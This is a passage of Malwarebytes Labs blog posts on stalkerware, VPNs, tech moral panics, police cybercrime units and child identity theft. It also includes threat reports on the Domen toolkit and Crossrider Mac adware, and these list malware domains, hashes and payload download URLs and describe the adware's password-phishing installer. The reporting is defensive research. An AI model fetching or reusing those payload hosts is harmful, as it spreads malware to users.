Though this threat may appear slippery, there is much that we in the cybersecurity community can do. We can better detect these types of threats and inform users about their dangers. We can train domestic abuse advocates about device security for themselves and for the survivors they support—something Malwarebytes has already done and will continue doing. We can gather a growing coalition of partners to share intelligence and samples to collectively fight.

We can work with law enforcement on improving their own cybersecurity awareness and training, demonstrating the ways in which technology can and has been abused or developing a collaborative taxonomy for smart, efficient reporting. Finally, we can partner with domestic violence researchers to better understand what domestic abuse survivors need for digital security and protection—and then implement those changes.

We make the technology. We can make it better protect users everywhere.

The post International Women’s Day: awareness of stalkerware, monitoring, and spyware apps on the rise appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bring your own privacy: VPNs for consumers and orgs

Malwarebytes - Fri, 03/06/2020 - 17:24

VPNs (virtual private networks) have been popular for quite some time now, and they’re worth a huge amount of money for the companies working in this area. They’re also at the forefront of combating potential repression and censorship around the world.

It might all sound a bit esoteric and unrelated to your general day-to-day requirements, but VPNs are absolutely a mainstream topic whether at home or in the workplace. The question nowadays probably isn’t so much “Do we need a VPN?” as “How do we get the most from the VPN we just bought?”

With that in mind, let’s cut right to the chase: We’re going to go over the pros and cons of jumping on the VPN bandwagon. With any luck, you’ll have a better idea of some of the perks and pitfalls associated with this realm.

It is, of course, worth mentioning the calculated risks taken when signing up to a VPN provider. If you’re determined to keep your data safe and your anonymity preserved, that’s great. However, that idea goes out the window if you simply sign up to the first service you come across.

VPN cons: fakes, rogues, and the long arm of the law

Please don’t fall into the trap of thinking, “I have my VPN, and now I’m a digital immortal.” There’s nothing worse than overhyping theoretical protections from all things unpleasant.

For example, 100 percent anonymity isn’t a guarantee—how can you be sure that provider X doesn’t keep logs? Is it true just because they said so? What happens if law enforcement turn up at their door with a warrant? They’re not going to get into a tussle with the law if they can help it, so it’s likely that whatever they do have, is headed in the general direction of the powers that be. This does rely heavily on where the VPN is located, so all cases are different—something to keep in mind when making a selection.

Mobile considerations

Mobile apps are incredibly popular for VPNs, with a significant chunk of younger users adopting the technology (some 70 percent of users are aged 35 or under). There are even pronounced differences in usage in the same cohort, so it’s a bad idea to guesstimate who is doing what.

Combine an unpredictable user base with countless mobile stores—some of which inadvertently play host to rogue apps—and this means unscrupulous individuals will move into the territory and try to scam people. Code injection for advertising, undisclosed data sharing, and VPNs used to attack or spam other services have all been in the news at some point, and you don’t necessarily have to be on a traditional desktop to run into these issues.

Bad ads muddy the waters

We’ve also seen examples where dubious scare tactic advertising has sent device owners to install pages for “free” VPN solutions, which themselves have some worrying statements in their terms of service. All of this before we get to the timeless scam where no VPN exists at all and they just want you to install some keyloggers.

As you can see, then, it’s bad out there—but VPNs are absolutely an advantage when it comes to keeping yourself a little more anonymous and secure online. They’re not a magic bullet, but then nothing else is either. If you’re of the mindset to explore and do a little homework before making the leap, it could be one of the stronger tools in your security/privacy arsenal.

You’ve heard the warnings; now it’s time for the measured response.

VPN pros: Securing business, helping out at home

Long gone are the days where the view was anybody using VPNs has something to hide/is up to no good. People simply want a little more privacy at home. And for businesses, it’s one more layer they can wrap around their network. If you need to make use of a remote access, business-approved VPN to be able to get on the network in the first place, it’s one more potential obstacle for attackers to get through.

Given the path of least resistance for many attacks, it could be the additional step that makes them say “too much hard work” and move on to potentially less secure targets. It’s unpleasant, but that’s how a good chunk of criminals operate: Why jump through hoops when you can walk through someone else’s front door to achieve the same result?

You don’t have to go too far back to see a steady churn of “Will my boss fire me?” missives in relation to firing up a VPN on corporate networks. An odd thing to get hung up on, considering so many workplaces will happily offer up a business-approved VPN in the first place. (You really shouldn’t be playing games on the network either way, regardless of VPN, but that’s another discussion).

Coffee shops and public Wi-Fi

Many offices are not just scattered across different regions, but also make use of decentralised employees working everywhere from living rooms to coffee shops. It stands to reason throwing a VPN into the mix is going to be beneficial in those circumstances, too. Employees on the VPN are also helping to reduce the visibility of their network traffic while out and about.

A great way to attract unwanted attention is by sitting on public Wi-Fi uploading/downloading sensitive workplace files and folders. Snoopers observing may well decide to take a more sustained interest in your business dealings, and you’ve accidentally made the entire organisation a target.

You could argue that you make yourself stand out more by overtly hiding what you’re doing in a room full of people surfing in the clear, in much the same way people making their Wi-Fi routers invisible is a large red flag. Having said that, I’d still rather lock things down while out and about versus the minuscule risk of a random person being so obsessed with you using a VPN that they make it their life’s work to take you down, instead of shrugging and  buying another coffee.

If anything, it’s probably quite reassuring for employees to know they have an additional safety blanket out on the road. When every other horror story tells us never to use airport hotspots or web cafes because someone evil is definitely going to hack you and steal your briefcase, it’s something you can give employees to even the odds.

Going undercover

One of the most common benefits of a VPN is hiding your location. If you fire up the TOR browser, for example, you can appear as though you’re in Mexico to the owner of the website you happen to be browsing, when you’re actually in Italy. Researching scam websites that only respond to mobiles? Easy: change your user agent string so it thinks you’re on an Android or iPhone.

Want to watch that show from the streaming service you’re signed up to, but it doesn’t work outside your region while on holiday? How about MMORPG gamers who get better performance from a different region’s server than their own but have no straightforward way to connect? That’s where the VPN, and its path to gamer glory, begins.

Regional reflections

Using a VPN has clear benefits for workplaces where employees travel a lot and security policies may insist on certain IP addresses/regions connecting to the network. You can’t get on the US network if you’re sitting in France, on a French network, with a French IP.

Depending on your role, you may need to access geo-locked third-party content excluding some regions but not others—if you can’t access the content, you may experience significant impact across the business. Whether people should be doing this is, of course, another discussion to be had, but there’s no point pretending people don’t do it. 

The humble VPN is here to stay

The verdict, to me, is very much in favour of VPN use. Whether you need it or not, VPNs can scale based on whether you want them for business or pleasure, and which essential tasks simply cannot be completed without one.

Like most tech tools, researched well and used correctly, it’ll be a great benefit to your day-to-day activities. Used poorly? You could end up running into one of several issues highlighted at the start of this post. The one situation you don’t need is your VPN being the kind of compromising element you were hoping to avoid in the first place.

The post Bring your own privacy: VPNs for consumers and orgs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Technology and the power of moral panic

Malwarebytes - Thu, 03/05/2020 - 16:00

Moral panic is a fascinating topic, and often finds itself tied up in the cutting edge-technology of the times once it works its way into the hands of younger generations. Music, games, movies—pretty much anything you can think of is liable to gatecrash the “won’t somebody think of the children?” party no matter how well-meaning or patently silly it is.

Last month, a poster was making the rounds informing parents that their children may be up to no good if they’re using forms of technology, such as virtual machines, TOR, and—uh—Discord.

Is it us or the children who are wrong? Before we explore the poster, I thought it might be interesting to wander through a couple of decades of overblown moral panic examples, where technology + teens = baffling worry. Spoiler: the children may not have been wrong after all.

1950s pelvis panic

Back in the mid 1950s, Elvis found it considerably more difficult to be a hound dog with the lower half of his body hidden from cameras. After a few appearances in full hip-swinging, pelvis-gyrating mode, TV producers decided it was all a bit too much for impressionable kids, so Elvis was turned into rock ‘n’ roll Max Headroom for one night only.

The story surrounding his legendary televisual explosion of moral panic is fascinating, as you can see from this deconstruction of what Elvis’ appearance on The Ed Sullivan Show actually entailed (spoiler: a distinct lack of Ed Sullivan…and Elvis, for that matter).

While The King’s earlier television appearances garnered much higher ratings than his extreme close-up on Sullivan’s show, the controversy is what triggers our collective memory. For better or worse, thanks to a distinct lack of Internet to capture Elvis’ full frontal for all of posterity, the historical event now boils down to “Elvis runs riot so we’d better jam the camera up his left nostril.”

1960s: a rocking good war

That’s WAR, all in caps so you know it’s definitely WAR and very serious. If broadcasting Elvis and his wildly gyrating pelvis to the world weren’t enough to send parents into a frenzy, the 1960s happened and all of a sudden, the rebellious youths decided to take to the streets in protest.

But we’re not talking about the Vietnam War, which was captured in gory detail for United States television audiences, stirring strong, sometimes violent anti-war demonstrations among younger generations. Nor are we trivializing the civil rights movement, for which TV news networks became the “chosen instrument of the revolution.” (Indeed, the revolution was televised.) Certainly both of these examples exemplify moral panic, but neither are trite.

In this case, overblown moral panic was tangled up in technology via general outrage aimed at two factions of British youth: The Mods and the Rockers. Both applied their everyday stylings to sleek, reasonably-affordable tech, such as motorbikes and mopeds. The added freedom granted by additional mobility was too much for the older generations, however.

The Mods didn’t really get on with the old guard of the Rockers, and so of course it all spiraled out into legendary riots, which may or may not have been a bit of pushing and shoving, depending on who you ask.

As with Elvis, the actual events are supplanted by fixed memories of the technology used to relay the incident or the technology used to reinforce both groups (in this case, biker gangs running riot, even if said “riot” is a little suspect).

1970s and 80s: dungeons and the occasional dragon

Wild times spanned two whole decades as Dungeons & Dragons somehow went from “cool role-playing game” to “this is a GATEWAY TO SATANISM!” The same moral outcry resulted from kids listening to heavy metal on record or cassette, with parents and lawyers arguing that an Ozzy Osbourne song made some teens kill themselves.

Evangelical groups decided that even dabbling in low tech tools and a little imagination could be a really bad thing. Youngsters thinking outside the box and making it up as they go along was enough to cause the kind of satanic panic reserved for actual Satanists.

Even as recently as 2010, you can see D&D making waves in prisons, which is pretty impressive for a game involving dice and a few bits of paper. And while 2016’s Stranger Things may have romanticized 1980s D&D playing, it’s still, interestingly enough, shown in relation to the occult. This is all, clearly, a little bit silly but nowhere as near as silly as things are about to get as we head into the 1990s.

1990s: when the cybers boil over

Early ’90s tech—besides its briefcase-sized car phones, fax machines, and dot matrix printers—was mostly characterised by the emergence of cybery things online. Cyberpunk, hacking, and the newfangled world of the world wide web generally provided massive opportunities for kids to realise their creativity. At the same time, lots of parents were sent into a panic about their kids spending all hours in front of the screen, messaging strangers in AOL group chats.

Steve Jackson Games, who made games ON computers but designed them FOR pen and paper, made extensive use of technology and also ran a bulletin board system (BBS) focused on all sorts of sci-fi/tech/fantasy topics with the (possibly unfortunate) name Illuminati BBS.

In the first week of March, 1990, the US Secret Service raided the office of SJG, along with the home of one of its employees, in one of the most famous raids of all time. Before we go any further, here’s a myth-busting list about the raid, which will immediately set straight some fact from fiction.

Read that? Good. Amongst the files and computers taken was GURPS Cyberpunk, and this went about as badly as you might think in the middle of a suspected computer crime raid. Law enforcement were apparently so baffled by this strange new world of innovation that they thought it was a “handbook for computer crime.” As one does.

The story dragged on for some time and nearly put SJG out of business, which is remarkable when you think about the severity of the actions taken versus the absolute nothing burger inside the SJG offices. Don’t worry, though, I’m sure things will be much more sensible as the 2000s progress.

2000s to present day: games, games, games

You probably know what’s coming, but the gradual ramp-up in computing technology takes aspects of previously-discussed moral panic and puts them in a blender, firing out at least 20 years worth of “video games will make your kids stupid/violent/unable to focus/generally altogether evil/ruined forever.” In fact, there’s a splash of moral panic pretty much anywhere teens and technology intersect today.

In cinema, many censorship laws were somewhat relaxed leading to unedited, full editions of older films being released. The spectre of so-called video nasties from the 1980s lived once more, leading to yet more worried expressions as older teens wandered off to cinemas. 

Music? Got you covered. Games? You better believe we’ve got you covered. Games are possibly the apex predator in terms of being blamed for society’s ill’s, because with games you can pretty much conjure up anything you can think of.

Well, perhaps not the only apex predator. Time to go back to the start of this blog and take a look at this controversial poster all over the news.

2020: poster panic

The poster in question was produced by the West Midlands Regional Crime Unit, and is one of those “What’s on your child’s computer?” efforts, which seems to come around every so often. If you see one of the tools on the list, you’re supposed to wonder if Little Jimmy has been breaking into banks every evening instead of 360 degree no-scoping a 38-year-old.

The problem is, it’s all a bit silly and outdated.

Anyone who’s been into a school anytime in the last few years should be fully aware that technology is a big driver of lessons. I have relatives whose kids regularly ask me about security because it’s quite literally part of their lessons.

Questions about password usage, security tips, ways bad people try to trick you, the tools they use, and the ways you can protect yourself all factor in. Unlike a decade or so ago in many locations, there are actual degrees that contain actual Internet security modules. I regularly go into universities and give talks on infosec for students soon to graduate. A lot of the time they have better technical knowledge than me in specific areas, and I’d be surprised if they didn’t.

I’ve personally been asked about TOR, Kali Linux, and Virtual Machines by another younger relative with an interest in computers. Am I suddenly reaching for the telephone because I think they’re about to hack the planet? Of course not.

Many, many people work in technology with a lot of these tools for reasons utterly unrelated to security. Virtual machines are not the exclusive preserve of getting up to no good, and it’s odd to think folks out there might only consider them in these terms.

Possibly the most baffling inclusion on the poster is Discord, a chat app massively popular in gaming and streaming circles because it’s “a popular communication platform often used to share hacking tips.” I mean, you may as well say “…and so is any other technology that’s ever been rolled out for distribution.” It’s such a wide-ranging, over-generalising sweep of a statement, I can only just about process it.

My advice is to take an interest in your children’s technology dabbling because it’s now an integral, massively important part of their daily learning experience and not because they’re about to go off and blow up a power station. This importance will only increase over time, so by all means invest in some security and hacking books and maybe even an old copy of GURPS Cyberpunk.

You may even get a kick out of it yourself.

The post Technology and the power of moral panic appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Are our police forces equipped to deal with modern cybercrimes?

Malwarebytes - Wed, 03/04/2020 - 18:21

“You should have asked for the presence of a digital detective,” Karen said when I told her what happened at the police station. I had accompanied a neighbor, who is a small business owner, that had been hit with ransomware and wanted to file a report. After listening to his story, the police officer at the desk asked if my neighbor had a description of the perpetrator. I may have groaned.

This wasn’t the first time I was disappointed by the lack of technical knowledge of the police. I had filed an online report about a sextortion scam months earlier and received a reply that said: “If you haven’t paid, you can delete the mail. If you did pay, we can handle your report.”

My offer to send them the full source of the email fell on deaf ears. No attempt was made to initiate a take-down or explain why deleting the email was enough. I happen to know how this works, but other victims might not know that sextortion emails are just bluffing. What’s to stop them from paying in the future?

Knowing how to report cybercrimes

Karen is a former Dutch police officer, and she knew that for reporting cybercrimes, there are police officers that have special training, the so-called “digital detectives.” In the Netherlands, they are officially called digital experts. I could have avoided disappointment if I had known the proper procedure to reach a digital expert.

In the United States, there may be an officer assigned to cyber, but in most precincts, it’s the person who happens to be on desk duty or the person who uses technology the most. The situation is even more dire at the local level.

For the ransomware case, we should have made an appointment and specifically asked for a digital expert to be present because we wanted to report a cybercrime. And online cybercrime reports are only possible in common cases, such as Microsoft tech support scams. They have standard forms you can fill out and submit.

While the experience was frustrating, it made me realize that police officers are not trained for expertise in all the new cybercrimes that have surfaced over the last few years. Comparing these individual experiences to the stories we read about elite police cyber units like Interpol, FBI, and the Dutch Team High Tech Crime, I realized the situation in local districts is much different from those highly specialized, national teams. Here’s what I learned after some digging around.

Cyber training

When asked, the Dutch police informed me that they have special training courses for digital experts, just like they have experts for drug-related crimes and financial experts. The digital experts can receive training in forensics, hacking, threat hunting, hardware access, reverse engineering, digital tracing, and network analysis. All these trained experts provide assistance in cases where their expert knowledge is advantageous.

In the UK, they seem to be one step ahead. Every police force now has a cybercrime unit, which will investigate and pursue offenders, help businesses and victims protect themselves from attack, and prevent vulnerable individuals to become cybercriminals. Of course, we know the US, where cybercrime is most common, only has a dedicated cyber team with the FBI. While there are FBI offices around the country, they aren’t present at every police station.

This shows us that different countries have their digital detectives organized in different ways. And it is good to be aware of their existence and the best procedure in your location to get their help if you need it.

International cooperation against cybercrime

One of the obvious difficulties in apprehending criminals that have defrauded people or organizations in your own country is that the criminal is likely to be across a few borders. And sometimes, the criminals are protected by a regime that is likely to turn a blind eye as long as the criminals only operate abroad.

International cooperation as we have seen in the take-over of dark web marketplaces, is not only important when it comes to crime fighting, but can also be of great value in cyberwar. There is already enough evidence of state-sponsored attacks on critical infrastructure, and it is important to know what these enemy forces are up to and capable off.

Sometimes, there are more effective ways to cripple an international gang of cybercriminals than to try and arrest them. One example is the No More Ransom initiative, where decryption keys for certain ransomware families are published. This brings down the income of the cybercriminal, and with that, it hopefully takes away their incentive to proceed on the path of crime.

Cyberbullying

The Internet and social media have introduced some forms of bullying that arguably might benefit from police involvement. Where in older times you might say, “Sticks and stones may break my bones, but words will never hurt me,” modern-day cyberbullying has a bigger, long-range impact. Someone posting compromising pictures or movies on social media can be hurtful for a long time.

Social media platforms are slow to respond to take-down requests, and a little pressure from the authorities might expedite their actions. Victims of cyberbullying, however, tend to receive little to no help from the authorities.

Investing in police skills

To meet a growing demand for specialized experts, the police force will need a good deal of extra funds and staff. The cost of failing to adequately meet these demands may result in heavier losses than society can afford. So even if we feel that we cannot free up the funds for these measures, consider that organizations, consumers, and governments may be handing out the same amount to cybercriminals, the equivalent of throwing money into a bottomless pit. In addition, the costs of recovering from cyberattacks are far higher than what we might pay in training.

A digital expert has to have knowledge about many fields

Digital experts can also be a useful asset when it comes to solving non-cybercrimes. In many cases, digital evidence may help the police locate criminals, view criminal activity around a home or business, or prove criminal intent.

For example, digital evidence might help place people and events within time and space to establish causality for criminal incidents. But collecting and submitting digital evidence legally requires different tools and processes from doing so for physical evidence, so a trained expert will be able to extract more evidence from the same device(s). They can do so not only by knowing where to look, but also by having the knowledge of how to handle a device so that no evidence gets destroyed.

Recommendations

At least every police station or sheriff’s office should have one digital expert available to at least take in reports of cybercrimes. These experts will know which information is needed to have a chance of apprehending the criminal, can advise the victim on how to proceed, and maybe help prevent them from becoming a victim again.

If this is not an achievable goal, set up an easy-to-use site to report cybercrimes online, where a special department of digital experts can do a triage, spot trends, and involve other departments where that is beneficial.

International cooperation will become even more important if we want to stand a chance against cybercriminals, whether they are organized in groups or groups of individuals that buy malware-as-a-service on the dark web.

The International Code of Conduct for Information Security is an international effort to develop behavioral norms in the digital space, submitted to the UN General Assembly in 2011 and in revised form in 2015. This code should be worked out in more detail and allow for international cooperation against cybercrime. And diplomatic efforts should be made to get this code ratified by more UN members.

Stay safe, everyone!

Special thanks to the Department of Communication of the Dutch Police Academy and the Media Desk of the Rotterdam police department.

The post Are our police forces equipped to deal with modern cybercrimes? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Child identity theft, part 1: On familiar fraud

Malwarebytes - Tue, 03/03/2020 - 20:17

In 2013, 30-year-old Axton Betz-Hamilton received an angry phone call from her father two weeks after her mother, Pam, died.

“What the hell were you thinking?” he screamed. He had just unearthed a credit card statement in her name that had run over its limit from a box of her mother’s paperwork.

Betz-Hamilton reasoned that the statement must be from one of the credit cards taken out by her identity thief, who had been using her Social Security number (SSN) since she was only 11. She wondered what the statement was doing in her mother’s possession.

“I don’t know,” her father had said, “but it’s here in this file folder, along with your birth certificate.” At that moment, Betz-Hamilton knew she had found the elusive identity thief who destroyed her life and put her father and long-dead grandfather into severe debt. Her own mom.

Identity theft is a genuine problem that strikes fear in most adults. For parents or guardians of children under the age of 18, however, the thought may not come to mind. However, child identity theft does happen, and this type of fraud is, frighteningly, becoming more common.

Child identity theft, also known as child identity fraud, usually occurs when someone takes a minor’s personally identifiable information (PII) and other data. At the top of the list is the Social Security Number (SSN), which parents usually receive as soon as their child is born. Other data that can be swiped are children’s names, physical addresses, dates of birth, and social media credentials.

A study by Javelin Strategy & Research revealed that, overall, more than 1 million US children had their identities stolen in 2017.

Having a child’s identity stolen is not that different from stealing an adult’s identity. In most cases, minors’ data is leaked through data breaches. Sometimes, parents inadvertently give away their child’s data, not knowing that they can choose to mostly withhold it.

Take, for example, a mother who fills out forms at the doctor’s office. Although many healthcare providers ask for an SSN, it is not always required. Instead, the Federal Trade Commission (FTC) advises parents and guardians to provide an alternative form of identification. Or they can also only give out the last four digits of the child’s SSN.

Child identity fraud has also been linked with cyberbullying. The 2018 Child Identity Fraud Study found that both bullying and fraud arise from the same vulnerabilities in a child: the tendency to overshare personal information online.

“Children who are unprepared to protect themselves from online risks are likely to encounter individuals who wish to target them emotionally or financially,” said Al Pascual, Senior Vice President, Research and Head of Fraud & Security at Javelin Strategy & Research. “Bullied children may be more vulnerable to fraud as they are taken advantage of when they seek friendship online.”

Minors who are cyberbullied are at least nine times more likely to be victimized by fraudsters compared to those who aren’t bullied. But another emerging trend in child identity theft establishes an even more worrying trend: What happens when the very people children should trust with their information are the ones abusing it?

What is familiar fraud?

While we usually connote adult identity theft with anonymous scammers, child identity theft may not always be conducted by the faceless, hooded hacker we see in stock photos and crime dramas.

Javelin Strategy & Research’s 2018 study found that 60 percent of child identity fraud victims personally know their thief. Known scammers range from the child’s parent, relative, or family friend to a hired caretaker or teacher. This is called familiar fraud.

Familiar fraud is a type of fraud wherein family members are found out as perpetrators of identity theft within the family. It’s a husband stealing his wife’s identity, aunties stealing their niece’s identity, one sibling after another’s, or—in Betz-Hamilton’s case—a parent stealing their child’s, partner’s, and father’s identities.

Sometimes, fraud is also considered “familiar” in nature if it is perpetrated by someone who is close to the family but not blood relatives. This could be friends, neighbors, or even coworkers.

Unlike other fraud, familiar fraud isn’t always conducted with an intent to harm. Sometimes, parents steal and use their child’s identity to subscribe to services, giving the reason that the child benefits from these services as well. However, according to Robert P. Chappell Jr., law enforcement veteran and author of the book Child Identity Theft: What Every Parent Needs to Know, this justification is a stretch.

Recommended reading: What is identity fraud?

There are several motivations behind identity thieves within the family. A parent or relative might be acting out of desperation, such as wanting to receive healthcare benefits but being unable to apply because they struggle with bad credit. At times, it is suggested, such relatives couldn’t help it due to psychiatric and psychological issues. Let us also not discount plain old greed.

Familiar fraudsters often keep the fraud going for as long as they can. Since they usually know their victim enough to pose as them and have ready access to mail with sensitive information—thus making familiar fraud another form of crime of opportunity—they can easily access accounts and even open new ones under their victim’s name.

When familiar fraud is brought to light, victims are forced to make a difficult decision: file a report against a family member or stay in debt. Sadly, victims tend to go for the latter. They are reluctant to file a report against their familial identity thief or cooperate with fraud investigations as they don’t want to get them in trouble despite of the trouble this has caused them. They also do this to avoid family backlash, drama, and to preserve family relationships.

If victims do take action on the familiar fraud, they don’t often get support from other family members as they find it unfathomable for a relative to be perpetrators of fraud against another relative.

If familiar fraud victims are willing to give their relative thief a pass, they are only putting themselves at a disadvantage. This is because it limits them from the available options, they can take to address the problem, which is their sullied identities due to poor credit. No police report or fraud investigation could also mean that lenders would be less inclined to consider their debt as fraudulent.

What are the repercussions of child identity theft within the family?

Effects of fraud, in general, could be immediate and long-lasting. But familiar fraud drags a lot more with it. It can go beyond merely going out of pocket fighting the problem (although this is a significant one). Familiar fraud deeply affects victims mentally, emotionally, and sometimes physically.

Apart from a wrecked credit, child victims of identity theft may find it difficult to believe that someone they fully trust, such as a parent, could harm them this way by letting them pay for their bad debts. This leads to emotional and psychological trauma. They may feel violated, betrayed, and guilty. In a study, Experian found that adults who had been child fraud victims reported feeling stressed, angered, and concerned. The experience also affected their feelings of self-worth, thus tending to feel suicidal.

Not only that: the physical well-being of identity fraud victims may manifest signs of struggle from the ordeal. In a 2017 Identity Theft: The Aftermath report [PDF], the Identity Theft Resource Center (ITRC) reported that stress (64.3 percent) topped the list. This is followed by loss of concentration or focus (37.1 percent); fatigue (35 percent); aches, pains, stomach issues, heart palpitations, and sweating (23.1 percent); sleep disturbances (48.3 percent); and an inability to work due to these physical symptoms (28.7 percent). This is why a number of victims usually seek the help of professionals to deal with their trauma.

In part 2 of this blog series, we’ll be touching on signs that your child’s identity may have been compromised, the digital footprints parents leave behind for their kids and the correlation to fraud, and how parents can reclaim their child’s identity.

The post Child identity theft, part 1: On familiar fraud appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep1: On RSA, the human element, and the week in security

Malwarebytes - Mon, 03/02/2020 - 17:15

Last week, we told you we were launching a fortnightly podcast, called Lock and Code. This week, we made good on our promise, with lots of headlines generated right here on Labs, as well as other security news around the web. In addition, we talk with Britta Glade, Director of Content and Curation for RSA Conference, about the theme for last week’s conference: “The Human Element,” plus which types of submissions do well and what types will almost always be rejected.

Tune in for all this and more on the premiere episode of the first season of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus, other cybersecurity news:

  • All ears: Are your smart devices around the home accidentally tuning in to your conversations? (Source: Moniotrlab)
  • Think that group is private? Think again: Certain private WhatsApp group invites are being indexed in Google. (Source: Vice)
  • Another day, another breach: This time around, it’s Slickwraps who feel the burn via content posted to a Medium blog. (Source: The Verge)
  • Scammers go for gold: It’s Olympics time again, and that means scams are almost certainly on the way (Source: Tech Republic)
  • E-scooters vulnerable to attack? Researchers report their findings on how open to abuse these popular devices are. (Source: ITP.net)

Stay safe, everyone!

The post Lock and Code S1Ep1: On RSA, the human element, and the week in security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Domen toolkit gets back to work with new malvertising campaign

Malwarebytes - Fri, 02/28/2020 - 17:54

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we had ever seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

A couple months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

The payload is this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit

search-one[.]info
panel-admin[.]best
mix-world[.]best

Smoke Loader

1a91b2a3a252554842de875c89f6eee105bc419d7e32d3a5c9f0f9078780ab30
vuterfaste[.]ru

IntelRapid

46.166.129[.]235/forum/files/client.exe
33d5f80242b4006ce14bba56692e1936157e0216b93faac823c42cc3f9ab4ec1

Vidar

46.166.129[.]235/forum/files/mass.exe
76ce130d2447f71bea8ed902959fd7e0aeac86b55f9e44a327c1f1c1bd73ba3f
molothunsen[.]com

Buran/Zeppelin

semantrus.pw/upload/open.exe
0163bb148d4eb632d00d6d3080e07bba46f2f3549e8f95a8ca8951c10280694f

Vidar

cq08462.tmweb[.]ru/88.exe
628a9c97a55155f60d3b5ae29bc64f1dca5a6baf2b4f6a1a1de5e836cd4fb73f
desperate[.]website

The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac adware is more sophisticated and dangerous than traditional Mac malware

Malwarebytes - Thu, 02/27/2020 - 18:34

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

http://cdn.mycouponsmartmac.com/download/Mac/InstallerResources/pwr.zip

This file is expanded into an app named mm-install-macos.app. The sole purpose of this app is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed webtools.app is downloaded and executed using the phished password to run as root:

http://cdn.myshopcouponmac.com/download/Mac/InstallerResources/wt.zip

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

http://dl.searchmine.net/download/Mac/InstallerResources/unified/SearchMine/imsearch.tar.gz

